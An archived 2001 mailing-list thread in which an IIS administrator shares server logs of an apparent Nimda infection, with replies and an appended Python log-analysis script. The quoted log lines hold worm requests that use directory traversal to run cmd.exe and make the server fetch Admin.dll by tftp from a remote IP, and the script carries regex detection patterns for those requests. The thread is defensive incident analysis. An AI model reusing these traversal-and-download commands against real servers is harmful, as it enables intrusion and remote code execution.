RE: [RE: [RE: Any leads?]]

From: dldean (dldean@private)
Date: Fri Sep 21 2001 - 14:46:55 PDT


    Mike,
    
    Here is a good starting place
    
    http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutio
    
    This link is for a Microsoft TechNet page describing security issues for web
    sites. They also have a "batten down the hatches" script for IIS, but I
    cannot find the URL for that page.
    
    
    Doug
    > -----Original Message-----
    > From: owner-crime@/var/spool/majordomo/lists/crime
    > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of
    > J.Michael Cuciti
    > Sent: Friday, September 21, 2001 2:33 PM
    > To: dldean; Kuo Jimmy
    > Cc: crime@private
    > Subject: Re: [RE: [RE: Any leads?]]
    >
    >
    > Yes, I am 206.98.124.52.  The ADMIN.DLL file was deleted and the
    > directories the event viewer is referencing do not exist on my system.
    > I have followed all instructions for removal from various postings on
    > CRIME.  None of the files referenced in those postings are on my system.
    >
    > Do any of you know how I might stop this attack?
    >
    > -Mike
    >
    >
    >
    > dldean@private (dldean) wrote:
    > This is 206.98.124.52 receiving get requests for the admin.dll from
    > 206.98.79.246  and directory requests for his machine from
    > 206.252.224.50 &
    > 208.238.181.162 .
    >
    > Doug
    >
    > > -----Original Message-----
    > > From: owner-crime@/var/spool/majordomo/lists/crime
    > > [mailto:owner-crime@/var/spool/majordomo/lists/crime]On Behalf Of Kuo,
    > > Jimmy
    > > Sent: Friday, September 21, 2001 2:06 PM
    > > Cc: crime@private
    > > Subject: RE: [RE: Any leads?]
    > >
    > >
    > > Oh, I didn't notice the followup questions you asked the first time.
    > >
    > > I don't know about the structure of your logs.  But are you
    > > 206.98.124.52?
    > >
    > > Could someone who reads IIS logs say if this is him sending or receiving
    > > GETs?
    > >
    > > And this is definitely Nimda.  I just don't know if you're the
    > > target or the culprit.  If you haven't upgraded, I'm tempted to believe
    > > you're infected and attacking others.  The TFTP command shows up only on
    > > or after infection.  And ADMIN.DLL (Nimda is admin spelt backwards) is
    > > also something that shows up after infection.  But then you say you
    > > don't have it...
    > >
    > > Jimmy
    > >
    > > > -----Original Message-----
    > > > From:	J.Michael Cuciti [SMTP:mcuciti@private]
    > > > Sent:	Friday, September 21, 2001 1:44 PM
    > > > To:	Kuo Jimmy; Crispin Cowan; Jimmy Sadri
    > > > Cc:	crime@private
    > > > Subject:	Re: [RE: Any leads?]
    > > >
    > > > All:
    > > >
    > > > I still have a script trying to run, but the location and folder don't
    > > > exist.  This is what I found in my log file:
    > > >
    > > > 206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\Admin.dll,
    > > >
    > > > 206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\Admin.dll,
    > > >
    > > > 206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273, 403, 5, GET, /scripts/root.exe, /c+dir,
    > > >
    > > > 206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, 1652, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
    > > >
    > > > 208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243, 500, 123, GET, /scripts/..A../winnt/system32/cmd.exe, /c+dir,
    > > >
    > > > If anybody knows what this is, please 'spain it to me.
    > > >
    > > > I am running IIS 3.0, NT4.0 w/sp3 (haven't upgraded, I inherited this,
    > > > not my fault :-) )
    > > >
    > > > In the event log I see this same type of message running every few
    > > > minutes.
    > > > The script is supposedly running from
    > > > \winnt\iisadmin\Scripts\..%5c..\admin.dll.  This does not exist.
    > > >
    > > > Thanks...
    > > >
    > > > Mike Cuciti
    > > > Network Service and Support Manager
    > > > Tuality Healthcare
    > > > 681.1749
    > > >
    > > >
    > > > "Kuo, Jimmy" <Jimmy_Kuo@private> wrote:
    > > > >The Melissa author was caught because he posted the infectious document
    > > > >from his own AOL account to a news group, rather than releasing it
    > > > >through a hacked account. His guilt was confirmed when the serial number
    > > > >in the document matched the PC in the dumpster outside his bedroom :-)
    > > >
    > > > No.  He used a hacked acct.  But we identified the exact time
    > of the use
    > > > of
    > > > the acct (newsgroup posting message ID) and the FBI traced the phone
    > > > records.
    > > >
    > > > And the PC was destroyed and never located.
    > > >
    > > > Where did you get your version of the story?
    > > >
    > > > >But Code Red and its derivatives are not Office documents, and
    > > > >therefore have no serial numbers. That investigators appear to have no
    > > > >leads months after Code Red appeared tells me that it was likely
    > > > >released to the wild from a compromised machine, or perhaps
    > > > >simultaneously released from multiple compromised machines. If the
    > > > >author(s) were good, then those compromised machines were initially
    > > > >attacked from other compromised machines. Likely all of these initial
    > > > >release vector machines have long since been wiped and re-installed,
    > > > >and the links to the author(s) have been cut.
    > > >
    > > > We have some "first instances" of traffic.  I don't know what the FBI's
    > > > doing with the information gathered so far.  But I agree that it's
    > > > difficult and not likely.
    > > >
    > > > Jimmy
    > >
    >
    >
    >
    
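The question Jimmy raises in the thread (is 206.98.124.52 the client sending these GETs or the server receiving them?) is answered by the column layout of the Microsoft IIS log format: the first field is the client IP and the seventh is the server IP. The script below is an added example, not code from any of the posters, that parses the five log entries quoted above, reads the direction from those two fields, and flags the request patterns visible in them (dot-dot traversal to cmd.exe, the root.exe probe, and the tftp fetch of Admin.dll). The field order is taken from the IIS 3.0/4.0 "Microsoft IIS log file format"; the indicator patterns are an illustrative subset chosen to match these lines, not a complete worm signature.

```python
"""Read IIS-format log lines and flag worm-style requests.

Added example for the thread above; not part of the original posts.
Assumptions: the Microsoft IIS log file format (IIS 3.0/4.0) field order,
and an illustrative (not exhaustive) set of request patterns.
"""
import re
from urllib.parse import unquote_plus

# Field order of the Microsoft IIS log file format (assumed from IIS 3.0/4.0 docs).
FIELDS = [
    "client_ip", "user", "date", "time", "service", "server_name", "server_ip",
    "time_taken", "client_bytes", "server_bytes", "status", "win32_status",
    "method", "target", "params",
]

# The five entries quoted in the post, re-joined onto one line each
# (the mail client had wrapped them mid-entry).
SAMPLE_LOG = """\
206.98.79.246, -, 9/18/01, 7:29:26, W3SVC, WWW, 206.98.124.52, 150, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20c:\\Admin.dll,
206.98.79.246, -, 9/18/01, 7:29:27, W3SVC, WWW, 206.98.124.52, 180, 151, 304, 200, 0, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+tftp%20-i%20206.98.79.246%20GET%20Admin.dll%20d:\\Admin.dll,
206.252.224.50, -, 9/18/01, 7:29:33, W3SVC, WWW, 206.98.124.52, 10, 72, 273, 403, 5, GET, /scripts/root.exe, /c+dir,
206.252.224.50, -, 9/18/01, 7:29:38, W3SVC, WWW, 206.98.124.52, 80, 96, 1652, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
208.238.181.162, -, 9/18/01, 7:29:46, W3SVC, WWW, 206.98.124.52, 10, 97, 243, 500, 123, GET, /scripts/..A../winnt/system32/cmd.exe, /c+dir,
"""

# ".." followed by a raw or URL-encoded path separator (illustrative subset).
TRAVERSAL_RE = re.compile(r"\.\.(%2f|%5c|%c0%af|%c1%9c|%252f|%255c|/|\\)", re.I)
# "tftp -i <remote-ip> GET <remote-file> <local-path>" as Nimda issued it.
TFTP_RE = re.compile(r"tftp\s+-i\s+(\S+)\s+get\s+(\S+)\s+(\S+)", re.I)


def parse_entry(line):
    """Split one IIS-format line into a dict keyed by FIELDS."""
    parts = [p.strip() for p in line.rstrip("\n").split(",")]
    if parts and parts[-1] == "":      # every entry ends with a trailing comma
        parts.pop()
    if len(parts) < len(FIELDS):
        raise ValueError("short IIS log line: %r" % line)
    entry = dict(zip(FIELDS, parts[:14]))
    entry["params"] = ", ".join(parts[14:])   # query string may itself hold commas
    entry["status"] = int(entry["status"])
    return entry


def classify(entry):
    """Return the list of indicators matched by this request (empty if clean)."""
    indicators = []
    target = entry["target"]
    params = unquote_plus(entry["params"])    # '+' and %20 both become spaces
    if TRAVERSAL_RE.search(target):
        indicators.append("dot_dot_traversal")
    low = target.lower()
    if low.endswith("cmd.exe"):
        indicators.append("cmd_exe")
    if low.endswith("root.exe"):              # cmd.exe copy left behind by earlier worms
        indicators.append("root_exe_backdoor")
    m = TFTP_RE.search(params)
    if m:                                     # remote host and file the shell was told to fetch
        indicators.append("tftp_fetch:%s:%s" % (m.group(1), m.group(2)))
    return indicators


def analyze(log_text, my_ip):
    """Flag suspicious entries and say whether my_ip was the client or the server."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        entry = parse_entry(line)
        indicators = classify(entry)
        if not indicators:
            continue
        if entry["server_ip"] == my_ip:
            direction = "inbound"     # my_ip is the web server being probed
        elif entry["client_ip"] == my_ip:
            direction = "outbound"    # my_ip is the one sending the GETs
        else:
            direction = "third_party"
        findings.append({
            "client_ip": entry["client_ip"],
            "server_ip": entry["server_ip"],
            "direction": direction,
            "status": entry["status"],        # 200 means IIS dispatched the request
            "target": entry["target"],
            "indicators": indicators,
        })
    return findings


def sources(findings):
    """Map each probing client IP to the indicators it triggered."""
    by_src = {}
    for f in findings:
        by_src.setdefault(f["client_ip"], []).extend(f["indicators"])
    return by_src


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG, "206.98.124.52"):
        print(f["direction"], f["client_ip"], "->", f["server_ip"],
              f["status"], f["target"], f["indicators"])
```

Run against the quoted entries, every finding comes out "inbound": 206.98.124.52 is the server column in all five, so the three other addresses are the ones probing it. The same function turned loose on the full log with the worker's own address as `my_ip` would show "outbound" entries if that host were itself scanning others, which is the distinction the thread was trying to make.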



    This archive was generated by hypermail 2b30 : Sun May 26 2002 - 11:25:48 PDT